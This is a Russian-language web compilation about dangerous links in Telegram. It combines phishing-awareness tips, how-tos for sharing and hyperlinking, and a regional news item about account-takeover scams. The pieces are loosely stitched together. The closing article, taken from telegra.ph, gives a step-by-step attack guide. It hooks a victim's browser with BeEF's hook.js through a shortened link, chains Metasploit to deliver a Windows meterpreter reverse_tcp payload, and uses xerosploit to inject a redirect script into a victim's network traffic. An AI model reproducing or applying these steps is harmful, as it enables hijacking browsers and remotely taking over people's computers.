Переход по мошенническим ссылкам в Телеграме может привести к серьезным последствиям, таким как угон аккаунта или утечка конфиденциальных данных. Поэтому важно понимать, как избежать опасностей, связанных с переходом по ссылкам в данном мессенджере.
Опасности перехода по мошенническим ссылкам в Телеграме
Переход по мошенническим ссылкам может стать причиной:
- взлома аккаунта в Телеграме, поскольку злоумышленники могут заполучить доступ к нему через коды авторизации из SMS;
- заражения устройства вирусами, которые могут украсть личную информацию;
- утечки конфиденциальных данных, таких как логины и пароли от социальных сетей и платежных систем.
Какие могут быть мошеннические ссылки
Мошенники могут использовать мошеннические ссылки, чтобы заполучить доступ к конфиденциальной информации. Подбор темы сообщения может быть крайне пугающим или стимулирующим:
- «Ваш аккаунт будеt заблокирован»;
- «Срочное сообщение от Службы безопасности».
Как злоумышленники угоняют аккаунты
Для угона аккаунта в Телеграме злоумышленники чаще всего используют два приема:
Как вас могут вычислить по ip с помощью ссылки
- заражение компьютера жертвы троянцем, которое происходит в процессе общения между мошенником и жертвой;
- представление рекламодателем, который узнает условия размещения поста в Телеграм-канале.
Как избежать опасностей
Если вы заметили подозрительную ссылку в Телеграме, обязательно следует принять следующие меры:
- Не переходите по подозрительным ссылкам и не вводите личные данные, такие как пароли и конфиденциальные данные.
- Изучите тщательно адрес сайта, перед тем как вводить туда личные данные.
- Используйте веб-браузеры, которые имеют механизмы защиты от фишинга (например, Google Chrome).
- Установите антивирус и регулярно обновляйте его.
- Никогда не скачивайте подозрительные файлы из незнакомых источников.
- Внимательно прочтите текст сообщения на наличие ошибок и неточностей.
- Отслеживайте транзакции на своем счету и немедленно информируйте банк о подозрительной активности.
Выводы
Переход по мошенническим ссылкам в Телеграме является серьезной угрозой, которая может привести к угона аккаунта или утечке конфиденциальных данных. Для защиты от подобных угроз следует следовать советам, представленным выше, и быть осторожным при взаимодействии с незнакомыми ссылками в Телеграме.
Как кидать ссылку на ТГ
Для того, чтобы кинуть ссылку на пост в Телеграм, нужно выполнить несколько простых действий. Сначала необходимо найти нужный пост в учетной записи пользователя. Затем, справа от этого поста стоит нажать на стрелочку, которая открывает список доступных опций. В этом списке нужно выбрать друга из списка контактов или адресата, на которого будет отправлена ссылка.
Если такой друг отсутствует в списке контактов, можно скопировать ссылку на пост, нажав на соответствующий пункт в списке опций. После этого ссылку можно будет отправить друзьям в других приложениях или социальных сетях. Таким образом, кидать ссылку на пост в Телеграм не составляет труда, и для этого нужно всего лишь выполнить несколько простых действий.
ФИШИНГ 21 ВЕКА — КАК ВАС ВЗЛАМЫВАЮТ МОШЕННИКИ. СХЕМА
Как сделать чтобы ссылка была кликабельна
Для того чтобы сделать ссылку кликабельной, необходимо выполнить несколько простых действий. Сначала необходимо скопировать адрес страницы, на которую нужно сделать ссылку, из адресной строки браузера. Затем следует набрать урл-заготовку из нескольких символов, которая состоит из квадратных скобок и слова url, заключенной в них.
После этого нужно вставить скопированный адрес страницы между этими квадратными скобками. Очень важно, чтобы адрес был вставлен без пробелов или других дополнительных символов, прямо между ними. В конце остается лишь написать название самой ссылки, которое правильно записывается внутри квадратных скобок. Это название и будет являться кликабельной частью ссылки, по которой пользователь сможет перейти на нужную ему страницу.
Как сделать гиперссылку в телеграмме на телефоне
В этой статье мы расскажем, как сделать гиперссылку в телеграмме на телефоне. Сделать это довольно просто. Сначала необходимо открыть диалог или канал и записать нужный текст. Затем нужно выделить нужный текст, удерживая его пальцем, после чего появится дополнительная строка. Нажимаем на три точки в этой строке.
В открывшемся меню необходимо найти пункт «Добавить ссылку». После этого откроется дополнительное окно, в которое нужно вставить ссылку. Теперь нужно только сохранить изменения. Гиперссылку можно использовать, например, чтобы поделиться где-то в интернете интересной статьей с друзьями или коллегами. Просто скопируйте ссылку и вставьте ее в беседу в телеграмме.
Все получатели смогут ее открыть и почитать.
Как сделать в ТГ переход по ссылке
Если вы хотите разместить ссылку на свой канал, профиль или чат в Telegram, это не сложно. Первый способ — войти на сайт сервиса и ввести адрес своего канала/профиля/чата в соответствующее поле. Затем нажмите кнопку и получите рабочий URL, который можно распространять. Второй способ — добавить свой адрес к домену сервиса и получить прямую ссылку на ваш канал, профиль или чат в Telegram.
Оба метода просты и быстры в использовании, что делает распространение ссылок на Telegram легким и удобным. Вы можете поделиться ссылкой с друзьями или использовать ее для продвижения своих бизнес-целей. В любом случае, многие пользователи Telegram уже об этом знают и используют этот сервис для переходов по ссылкам.
При переходе по мошеннической ссылке в Telegram пользователю может быть предложено ввести свой номер телефона. Затем злоумышленники могут запросить код авторизации, который был отправлен на мобильный телефон в сообщении SMS. Если пользователь предоставит им эту информацию, злоумышленники получат доступ к аккаунту Telegram пользователя и смогут использовать его данные в своих целях. Пользователи должны всегда быть осторожными при предоставлении личной информации и следить за тем, что они нажимают в Интернете, особенно на неизвестных или не проверенных сайтах. Это поможет почувствовать себя более защищенным от мошенничества и вредоносных действий со стороны злоумышленников в Интернете.
Источник: svyazin.ru
Такие ссылки стало опасно открывать в Телеграм и Ватсап*
В мессенджерах — Ватсап* и Телеграм — орудуют мошенники.
Например, от вашего знакомого приходит сообщение с предложением перейти по какой-либо ссылке. Это может быть любая ссылка. Там требуется ввести код-идентификатор. Таким образом злоумышленники пытаются получить доступ к вашим данным, взломать ваш аккаунт. Особенно часто сейчас это можно наблюдать в Телеграме.
Уже от вашего имени мошенники могут начать рассылать вашим контактам всевозможные сообщения. Чаще всего они от вашего лица просят деньги. Ваши знакомые, видя фразу вроде: «Мне срочно нужны деньги, переведи 1000 рублей, все объясню потом», переводят деньги якобы вам. На самом деле средства отправляются на счет мошенников.
Это новый вид мошенничества, рассказали в УМВД по области.
* — принадлежит компании Meta, признанной экстремистской и запрещенной в РФ.
Лето в РФ отметится погодными аномалиями
Астраханцы варят компот из неожиданного растения
Астраханские верфи строят уникальные сухогрузы
Длительное похолодание идет в Астрахань
В Астрахани ускорят реконструкцию северных очистных сооружений
Комментарии
Подписывайтесь на «Каспийинфо» в «Google Новости», «Дзен.Новости» и на наш канал в «Дзен». Cледите за главными новостями Астрахани и области в Telegram-канале, «ВКонтакте» и «Одноклассниках»
Сетевое издание «Информационно-новостной портал «КаспийИнфо»
Свидетельство о регистрации ЭЛ № ФС 77 — 68109 от 21.12.2016, выдано Федеральной службой по надзору в сфере связи, информационных технологий и массовых коммуникаций
Учредитель: А.Н. Нечаев
Главный редактор — А.Н. Нечаев
Телефоны редакции: 8 (8512) 48 18 14
или по телефону: 8 (8512) 48-18-06
Мнения авторов статей, опубликованных на портале «КаспийИнфо», материалов, размещённых в разделе «Моя тема», а также комментариев пользователей к материалам сайта могут не совпадать с позицией портала «КаспийИнфо».
Подписка на новости: RSS
Данные погоды предоставляются сервисом
У вас отключены Cookie или JavaScript. Для полноценного использования сайта, пожалуйста, включите их в своём браузере.
Источник: kaspyinfo.ru
Опасность перехода по неизвестным URL.
Приветствую друзья! Сегодня мы поговорим о всей опасности перехода по URL от неизвестных лиц. Также будет много практики. Надеюсь вам будет интересно. Приступим!
Введение.
Каждый раз когда вы переходите по ссылке от неизвестного вам человека, задумывались ли вы о всей опасности того что вы сделали?
Переходя по ссылке вы можете не подозревать, но на вашем устройстве после перехода могут находится вредоносные программы а ваши персональные данные могут быть похищены. Сегодня мы на примерах убедимся во всей опасности.
- Первое что может случится при переходе по ссылке это то, что злоумышленник получат доступ к вашим аккаунтам социальных сетей.
(Данный метод мы затрагивать не будем. Он был описан мной в цикле статей — Получение доступа к аккаунтам социальных сетей.)
- Могут узнать ваш IP. И если вы думаете что это не страшно, то вы глубоко ошибаетесь.
- Подгрузить малварь используя exploit pack.
На мой взгляд, это самое серьезное что может произойти. Ну что, меньше теории больше практики)
Подгружаем малварь.
Exploit pack — это своеобразная связка эксплойтов.
К при большому сожалению я не буду показывать в этой теме использование exploit pack’а. По той простой причине, что огонь это не игрушка. Но мы все равно завладеем всем устройством пользователя когда он перейдет по ссылке. А поможет нам сегодня beef в связке с metasploit. Этот способ я придумал совсем недавно.
Beef — это фреймворк для проведения XSS атак путем заражения и дальнейшего использования.
Metasploit — фреймворк для поиска и эксплоутации уязвимостей. То есть для проветения тестирования на проникновение.
Запуск beef.
В терминале пишем:
beef-xss
Переходим по ссылке:
Теперь нужно авторизироватся. Логин и пароль по умолчанию beef:beef.
Нам нужно чтобы «жертва» выполнила у себя скрипт hook.js
Нужно подгрузить его ей.
Далее сократите ссылку и скиньте пользователю. Как только он переходит по ссылке на панели управления beef в разделе Online browsers появится активный браузер. Это браузер нашего пользователя.
Половина дел сделано. Теперь подключим к нашей работе metasploit. Для этого:
- Открываем файл config.yaml у beef. Часто он находится в этой дериктории — /usr/share/beef-xss/
- Ищем там раздел extension. У metasploit меняем значение параметра на true
3. Теперь же открываем файл /usr/share/beef-xss/extensions/metasploit/config.yaml и изменяем значение параметров у callback_host и host.
4. Запускаем metasploit и пишем следующее
msf> load msgrpc
И снова открываем файл из пункта 3. В pass вписываем получившийся с генерированный пароль. Остается сохранить.
Переходим в /usr/share/beef-xss/ и пишем
./beef -x
После этого в beef загрузятся exploit’ы.
Теперь нам доступны exploit’ы которые мы тоже подгрузить пользователю и выполнить их. Для начала я хотел бы узнать какая ОС у моего пользователя.
И как видно на скриншоте — это windows.
Теперь переходим во вкладку Commands и ищем — msf_ms05_054_onload
Выберем payload. Так как у моей «жертвы» windows я выбрал — windows/meterpreter/reverse_tcp
Заполняем все поля.
Теперь открываем msf и пишем
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST exploit
о второй команде пишете название пайлоада который выбрали в beef. Вот и все)
А пользователь всего-то перешел по ссылке.
А что если пользователь придерживается правил «я по незнакомым ссылкам не хожу»? На этот случай у нас имеется еще один ответ. Создаем файл hack.js с таким содержимым:
document.location.href=»http://:3000/demos/basic.html»;
Запускаем xerosploit. И выбираем:
scan —> ip жертвы —> injectjs —> run —> путь до hack.js
Далее проделываем выше описанное.Вот так мы взломали не о чем не подозревающего пользователя. Будьте осторожны друзья)
Вывод
Не стоит переходить по ссылкам от незнакомцев, это может нанести критический вред вашему устройству. А представьте себе если залить hook.js на уязвимый к xss веб ресурс? Последствия просто ужасны. Надеюсь вам понравилась данная статья! Источник
Источник: telegra.ph